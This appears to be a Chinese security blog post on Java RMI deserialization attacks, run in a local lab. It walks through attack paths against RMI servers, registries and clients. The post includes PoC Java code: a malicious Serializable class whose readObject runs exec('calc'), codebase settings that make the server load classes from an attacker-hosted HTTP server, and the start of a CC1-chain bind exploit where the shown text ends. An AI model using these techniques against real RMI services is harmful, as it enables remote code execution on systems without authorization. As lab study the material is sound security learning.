<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="RMI攻击（二）, Ethe&#39;s blog">
    <meta name="description" content="前言在第一篇的时候已经分析了RMI整个调用的流程，所以在这里就写一下攻击的流程
根据第一篇的分析
我们已知
攻击服务端1.UnicastServerRef#dispatch -&amp;gt; UnicastServerRef#unmarshalV">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>RMI攻击（二） | Ethe&#39;s blog</title>
    <link rel="icon" type="image/png" href="https://epicture.oss-cn-beijing.aliyuncs.com/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/css/matery.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/css/my.css">

    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/jquery/jquery-3.6.0.min.js"></script>
    <script src="https://sdk.jinrishici.com/v2/browser/jinrishici.js" charset="utf-8"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>



   <style>
    body{
       background-image: url(https://cdn.jsdelivr.net/gh/Tokisaki-Galaxy/res/site/medias/background.jpg);
       background-repeat:no-repeat;
       background-size: cover;
       background-attachment:fixed;
    }
</style>



<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Ethe&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Ethe&#39;s blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://epicture.oss-cn-beijing.aliyuncs.com/medias/featureimages/12.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">RMI攻击（二）</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: scroll;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }
    #toc-content .is-active-link::before {
        background-color: #42b983;
    }
    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }
    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                                <span class="chip bg-color">web学习</span>
                            </a>
                        
                            <a href="/tags/Java/">
                                <span class="chip bg-color">Java</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-05-18
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2023-05-21
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    5.3k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    21 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>在第一篇的时候已经分析了RMI整个调用的流程，所以在这里就写一下攻击的流程</p>
<p>根据第一篇的分析</p>
<p>我们已知</p>
<h2 id="攻击服务端"><a href="#攻击服务端" class="headerlink" title="攻击服务端"></a><strong>攻击服务端</strong></h2><p><strong>1.UnicastServerRef#dispatch -&gt; UnicastServerRef#unmarshalValue-&gt;客户端攻击服务端</strong></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230518160745279.png" alt="image-20230518160745279"></p>
<p><strong>2.UnicastServerRef#oldDispatch-&gt;DGCImpl_Skel#dispatch-&gt;客户端攻击服务端</strong></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230518160918311.png" alt="image-20230518160918311"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230518161002709.png" alt="image-20230518161002709"></p>
<h2 id="攻击注册中心"><a href="#攻击注册中心" class="headerlink" title="攻击注册中心"></a><strong>攻击注册中心</strong></h2><p><strong>UnicastServerRef#oldDispatch-&gt;RegistryImpl_Skel#dispatch-&gt;客户端/服务端攻击注册中心</strong></p>
<p>这个路线和攻击服务端的DGCImpl_Skel是一样的，只不过skel不同罢了</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230518161205087.png" alt="image-20230518161205087"></p>
<h2 id="攻击客户端"><a href="#攻击客户端" class="headerlink" title="攻击客户端"></a><strong>攻击客户端</strong></h2><p><strong>1.RegistryImpl_Stub#lookup-&gt;注册中心攻击客户端</strong></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230518162838720.png" alt="image-20230518162838720"></p>
<p>假如注册中心返回的是恶意对象，就可能在反序列化的时候被攻击</p>
<p><strong>2.UnicastRef#invoke-&gt;StreamRemoteCall#executeCall-&gt;注册中心/服务端攻击客户端</strong></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230518161821040.png" alt="image-20230518161821040"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230518161830443.png" alt="image-20230518161830443"></p>
<p>理论上只要调用invoke方法的地方都可以被攻击，executeCall是真正处理网络请求的地方，如果请求后返回的内容的是TransportConstants.ExceptionalReturn这个错误，就会进行反序列化</p>
<p><strong>3.DGCImpl_Stub#dirty-&gt;服务端攻击客户端</strong></p>
<p>本质和2是一样的，只不过是通过DGCImpl_Stub调用了invoke方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230518164558344.png" alt="image-20230518164558344"></p>
<p><strong>4.UnicastRef#invoke-&gt;UnicastRef#unmarshalValue-&gt;服务端攻击客户端</strong></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230518165513594.png" alt="image-20230518165513594"></p>
<h1 id="攻击实现"><a href="#攻击实现" class="headerlink" title="攻击实现"></a>攻击实现</h1><p>在前言里我们梳理了几种攻击的路径，接下来就来实际看看攻击方法。</p>
<p>我们先看一下在没有java安全机制的情况下的攻击实现</p>
<h2 id="攻击服务端-1"><a href="#攻击服务端-1" class="headerlink" title="攻击服务端"></a>攻击服务端</h2><h3 id="①-恶意服务参数"><a href="#①-恶意服务参数" class="headerlink" title="① 恶意服务参数"></a>① 恶意服务参数</h3><p>攻击路线：UnicastServerRef#dispatch -&gt; UnicastServerRef#unmarshalValue</p>
<p>在服务端接收到客户端的参数之后，会对服务端需要接受的参数类型进行判断</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519134149753.png" alt="image-20230519134149753"></p>
<p>假设不是基本类型，就会对传过来的内容进行反序列化，这里就可以成为我们的攻击点</p>
<p><strong>不过这个攻击有个条件，要求服务端必须接收与传入的poc类型一致的参数，最通用的就是Object类型，且客户端必须知道服务端实现的接口内容，否则的话不会到unmarshalValue就会报错</strong></p>
<p>然后就只需要保证传个能反序列化的poc且服务端有对应依赖就行了</p>
<p><img src="/2023/05/18/RMI%E6%94%BB%E5%87%BB%EF%BC%88%E4%BA%8C%EF%BC%89/Users/ethe/AppData/Roaming/Typora/typora-user-images/image-20230519141121767.png" alt="image-20230519141121767"></p>
<p>我这里传了个cc1的链，代码可以看cc链的那篇文章</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519141443549.png" alt="image-20230519141443549"></p>
<p>但是如果只能攻击接收Object类型的接口，那本来就不大的攻击面就更小了，有没有办法能够攻击接收String类型的参数呢</p>
<p>答案是可以的</p>
<p>一般情况下，server端和client端的接口应该是一致的，而当不一致时，client端会报错</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519163747579.png" alt="image-20230519163747579"></p>
<p>根据报错可以知道，在UnicastServerRef.dispatch里的这一句是负责判断方法是否存在的</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519163910265.png" alt="image-20230519163910265"></p>
<p>这句话会调用hashmap的get方法，然后获取指定 key 对应对 value</p>
<p>因为这个op是我们传进去的内容的key，和server端不同，自然不能查找到method，导致客户端报错。</p>
<p>那就是说如果我们能够控制这个key，那么即使我们传入的是其他东西，他也会找到method，然后继续执行这段程序，然后在unmarshalValue里进行反序列化</p>
<p>这里有四种方法</p>
<ul>
<li>通过网络代理，在流量层修改数据</li>
<li>自定义 “java.rmi” 包的代码，自行实现</li>
<li>字节码修改</li>
<li>使用 debugger</li>
</ul>
<p> <del>Java Agent不会，自定义 “java.rmi” 包的代码不会，流量层修改数据不会</del></p>
<p>这里我就只用debugger的方式改了</p>
<p>首先，虽然通过这种方式在服务端不接收Object类型参数的时候也可以把我们的poc传过去，但是，在改的时候必须保证客户端也需要有服务端所对应的方法。比如服务端是接收String类型的sayHallo方法，那么客户端也要有这个方法才能改成功</p>
<p>在客户端的RemoteObjectInvocationHandler类里的invokeRemoteMethod方法处下断点</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519165201947.png" alt="image-20230519165201947"></p>
<p>改之前</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519170948543.png" alt="image-20230519170948543"></p>
<p>改之后</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519171050931.png" alt="image-20230519171050931"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519171115833.png" alt="image-20230519171115833"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519171129010.png" alt="image-20230519171129010"></p>
<h3 id="②-动态类加载"><a href="#②-动态类加载" class="headerlink" title="② 动态类加载"></a>② 动态类加载</h3><p>动态类加载是RMI的一个特性</p>
<p>如果客户端在调用时，<strong>传递了一个可序列化对象</strong>，这个对象在服务端不存在，会抛出ClassNotFound 的异常，但RMI支持动态类加载，若设置了<code>java.rmi.server.codebase</code>属性，则会尝试以该地址作为额外的classpath获取<code>.class</code>并加载和反序列化，可以使用以下两者方式指定</p>
<ul>
<li><code>System.setProperty(&quot;java.rmi.server.codebase&quot;, &quot;http://127.0.0.1:7777/&quot;);</code></li>
<li><code>-Djava.rmi.server.codebase=&quot;http://127.0.0.1:9999/&quot;</code></li>
</ul>
<p>但是由于一些安全限制，这个攻击方式还有一些其他条件</p>
<ol>
<li>由于Java SecurityManager的限制，默认是不允许远程加载的，如果需要进行远程加载类，需要安装RMISecurityManager并且配置<code>java.security.policy</code>，这在后面的利用中可以看到。</li>
<li>属性 <code>java.rmi.server.useCodebaseOnly</code> 的值必需为false。但是从JDK 6u45、7u21版本之后开始，<code>java.rmi.server.useCodebaseOnly</code> 的默认值就是true。当该值为true时，将禁用自动加载远程类文件，仅从CLASSPATH和当前虚拟机的<code>java.rmi.server.codebase</code> 指定路径加载类文件。使用这个属性来防止虚拟机从其他Codebase地址上动态加载类，增加了RMI ClassLoader的安全性。</li>
</ol>
<p>再来几点其他的东西</p>
<ul>
<li>动态类加载机制不区分角色，在三端中都可以触发</li>
<li>需要在触发动态类加载机制的一端设置<code>SecurityManager</code>，否则会报错。前面也提到了</li>
<li>需要在触态类加载机制的一端设置<code>java.rmi.server.useCodebaseOnly=false</code>，该方法用于限制该机制是否允许远程加载。</li>
<li>设置<code>java.rmi.server.codebase</code>为目标类远程地址，不是在触发端设置的，触发端并不知道地址，而是Client端提供的</li>
<li>恶意代码需要放在恶意类的static块或readObject中(回顾原生反序列化)</li>
</ul>
<p>首先，这玩意儿得先设置Java安全策略</p>
<p>你得先写一个xxx.policy</p>
<pre class="language-policy" data-language="policy"><code class="language-policy">grant &#123;
    permission java.security.AllPermission;
&#125;;</code></pre>

<p>这是最宽松的安全策略，java基本上可以干所有事</p>
<p>然后因为是攻击的是服务端，所以服务端还要使用这个安全策略</p>
<p>还要关闭useCodebaseOnly</p>
<pre class="language-java" data-language="java"><code class="language-java">System.setProperty(&quot;java.rmi.server.useCodebaseOnly&quot;, &quot;false&quot;); 	
System.setProperty(&quot;java.rmi.server.hostname&quot;, &quot;127.0.0.1&quot;);&#x2F;&#x2F;指定RMI服务器的主机名为127.0.0.1
System.setProperty(&quot;java.security.policy&quot;, &quot;D:\\ctftools\\ctfscript\\javastudy\\RMIServer\\server.policy&quot;);
if (System.getSecurityManager() &#x3D;&#x3D; null) &#123;
            System.out.println(&quot;Setup SecurityManager&quot;);
            System.setSecurityManager(new SecurityManager());&#x2F;&#x2F;设置安全管理器</code></pre>

<p>这个设置安全管理器一定要在设置安全策略后边，<del>真nm的，查了我一下午</del></p>
<p>服务端的设置就完成了</p>
<p>完整代码是</p>
<pre class="language-java" data-language="java"><code class="language-java">public class RMIServer &#123;
    public static void main(String[] args) throws RemoteException, AlreadyBoundException, MalformedURLException &#123;
        if (System.getSecurityManager() &#x3D;&#x3D; null) &#123;
           System.out.println(&quot;Setup SecurityManager&quot;);
           System.setProperty(&quot;java.rmi.server.useCodebaseOnly&quot;, &quot;false&quot;); 			                                    System.setProperty(&quot;java.rmi.server.hostname&quot;, &quot;127.0.0.1&quot;);
            System.setProperty(&quot;java.security.policy&quot;, &quot;D:\\ctftools\\ctfscript\\javastudy\\RMIServer\\server.policy&quot;);
            System.setSecurityManager(new SecurityManager());

        &#125;

        System.out.println(&quot;Security Manager: &quot; + System.getSecurityManager());
        System.out.println(&quot;Security Policy: &quot; + System.getProperty(&quot;java.security.policy&quot;));

        IRemoteObjImpl iRemoteObj &#x3D; new IRemoteObjImpl();

        &#x2F;&#x2F; 设置安全策略后再创建注册中心
        LocateRegistry.createRegistry(1099);

        Naming.bind(&quot;rmi:&#x2F;&#x2F;127.0.0.1:1099&#x2F;iRemoteObj&quot;, iRemoteObj);
        System.out.println(&quot;Registry运行中......&quot;);
    &#125;
&#125;</code></pre>

<p>然后再准备一个恶意类，因为你要借助的是动态类加载，所以恶意类的恶意代码只能写在静态代码块里，或者是readObject里</p>
<pre class="language-java" data-language="java"><code class="language-java">public class evil implements Serializable &#123;

    static &#123;
        try &#123;
            System.out.println(&quot;success&quot;);
        &#125; catch (Exception e) &#123;
            e.printStackTrace();
        &#125;
    &#125;

    private void readObject(java.io.ObjectInputStream s)
            throws IOException, ClassNotFoundException, IOException &#123;
        &#x2F;&#x2F; Read in the threshold (ignored), loadfactor, and any hidden stuff
        s.defaultReadObject();
        System.out.println(&quot;readObject&quot;);
        Runtime.getRuntime().exec(&quot;calc&quot;);
    &#125;
&#125;
</code></pre>

<p>客户端</p>
<pre class="language-java" data-language="java"><code class="language-java">public class RMIClient implements Serializable &#123;
    public static void main(String[] args) throws Exception&#123;
        IRemoteObj remoteObj &#x3D; (IRemoteObj)Naming.lookup(&quot;rmi:&#x2F;&#x2F;127.0.0.1:1099&#x2F;iRemoteObj&quot;);
        Object evil &#x3D; new evil();
        String s &#x3D; remoteObj.sayHello(evil);
    &#125;
&#125;</code></pre>

<p>我们首先来测试一下</p>
<p>把evil这个文件放到服务端</p>
<p>然后执行</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519212319623.png" alt="image-20230519212319623"></p>
<p>简单跟一下</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519214503718.png" alt="image-20230519214503718"></p>
<p>还是unmarshalValue那地方对客户端传过来的参数做反序列化的时候导致的类加载和反序列化（没跟出来怎么进行了类加载，虽然确实调用了resolveClass进行了类加载，但是没看出来咋跳过去的，就贴个执行的图吧</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519220617845.png" alt="image-20230519220617845"></p>
<p>然后接下来我们把这个evil文件从服务端删掉</p>
<p>这时候再执行客户端会报错</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519220807873.png" alt="image-20230519220807873"></p>
<p>再配置一下客户端</p>
<pre class="language-txt" data-language="txt"><code class="language-txt">-Djava.rmi.server.useCodebaseOnly&#x3D;false -Djava.rmi.server.codebase&#x3D;http:&#x2F;&#x2F;192.168.1.104:8888&#x2F;</code></pre>

<p>或者用代码</p>
<pre class="language-none"><code class="language-none">System.setProperty(&quot;java.rmi.server.useCodebaseOnly&quot;, &quot;false&quot;);        System.setProperty(&quot;java.rmi.server.codebas&quot;, &quot;http:&#x2F;&#x2F;127.0.0.1:8888&#x2F;&quot;);</code></pre>

<p>然后用python在字节码的路径下面开个8888端口的服务</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519222257800.png" alt="image-20230519222257800"></p>
<p>这里还是报错了，但是看一眼服务器</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519222325440.png" alt="image-20230519222325440"></p>
<p>说明服务端已经请求了这个网址，只不过因为路径问题所以没有访问到。所以换个路径</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519222502503.png" alt="image-20230519222502503"></p>
<p>成了</p>
<p>这个漏洞其实感觉利用面也挺小的，现在的服务应该大部分都是java8了，而这些配置的要求很难实现</p>
<h3 id="③-替身攻击"><a href="#③-替身攻击" class="headerlink" title="③ 替身攻击"></a>③ 替身攻击</h3><p>看其他师傅的博客里说的一种，但是感觉有点鸡肋了</p>
<blockquote>
<p>在讨论对 Server 端的攻击时，还出现了另外一种针对参数的攻击思路，我称其为替身攻击。依旧是用来绕过当参数不是 Object，是指定类型，但是还想触发反序列化的一种讨论。</p>
<p>大体的思路就是调用的方法参数是 <code>HelloObject</code>，而攻击者希望使用 CC 链来反序列化，比如使用了一个入口点为 HashMap 的 POC，那么攻击者在本地的环境中将 HashMap 重写，让 HashMap 继承 HelloObject，然后实现反序列化漏洞攻击的逻辑，用来欺骗 RMI 的校验机制。</p>
<p>这的确是一种思路，但是还不如 hook RMI 代码修改逻辑来得快，所以这里不进行测试。</p>
</blockquote>
<h2 id="攻击注册中心-1"><a href="#攻击注册中心-1" class="headerlink" title="攻击注册中心"></a>攻击注册中心</h2><p>再来看攻击注册中心</p>
<p>根据前言的内容，攻击注册中心的路径是这条</p>
<p><strong>UnicastServerRef#oldDispatch-&gt;RegistryImpl_Skel#dispatch-&gt;客户端/服务端攻击注册中心</strong></p>
<p>其实对于注册中心而言，他根本就不需要知道哪个是客户端，哪个是服务端，他只需要知道有人调用了bind和lookup这些方法就行了</p>
<p>调用bind的就是服务端要绑定方法，调用lookup就是客户端要查找方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230519133544155.png" alt="image-20230519133544155"></p>
<p>但是由于参数的问题<code>lookup</code>、<code>unbind</code>的参数类型都是String，这在运行前编写代码时限制了我们传入恶意Object。不过可以跟攻击服务端的时候的方式一样，去绕过这个</p>
<h3 id="调用bind-amp-rebind"><a href="#调用bind-amp-rebind" class="headerlink" title="调用bind&amp;rebind"></a>调用bind&amp;rebind</h3><p>bind和rebind这两个实际上就是服务端攻击注册中心，但是利用价值不是很高，因为高版本java的服务端和注册中心本来就在一起，因此不需要去打</p>
<p><strong>还有一个问题就是，如果服务端和客户端在一起，那可以直接通过<code>Registry registry = LocateRegistry.createRegistry(1098)</code>的方式获取注册中心，然后进行绑定，也就不需要借助stub进行代理然后通信了，可以直接和skel通信，那么在skel里，由于反序列化的是网络通信传过来的东西，现在没网络通信了，自然没东西进行反序列化了</strong></p>
<p>所以必须使用<code>Registry registry = LocateRegistry.getRegistry(1098);</code>来获取注册中心</p>
<p>poc</p>
<pre class="language-java" data-language="java"><code class="language-java">public class RMIServer &#123;
    public static void main(String[] args) throws IOException, AlreadyBoundException, NoSuchFieldException, ClassNotFoundException, InvocationTargetException, NoSuchMethodException, InstantiationException, IllegalAccessException &#123;
        &#x2F;&#x2F;创建远程对象
        IRemoteObjImpl iRemoteObj &#x3D; new IRemoteObjImpl();
        &#x2F;&#x2F;创建注册中心
        LocateRegistry.createRegistry(1098);
        &#x2F;&#x2F;获取注册中心
        Registry registry &#x3D; LocateRegistry.getRegistry(1098);
        &#x2F;&#x2F;这就是个单纯的cc1的链
        Object o &#x3D; cc1.cc1exp();
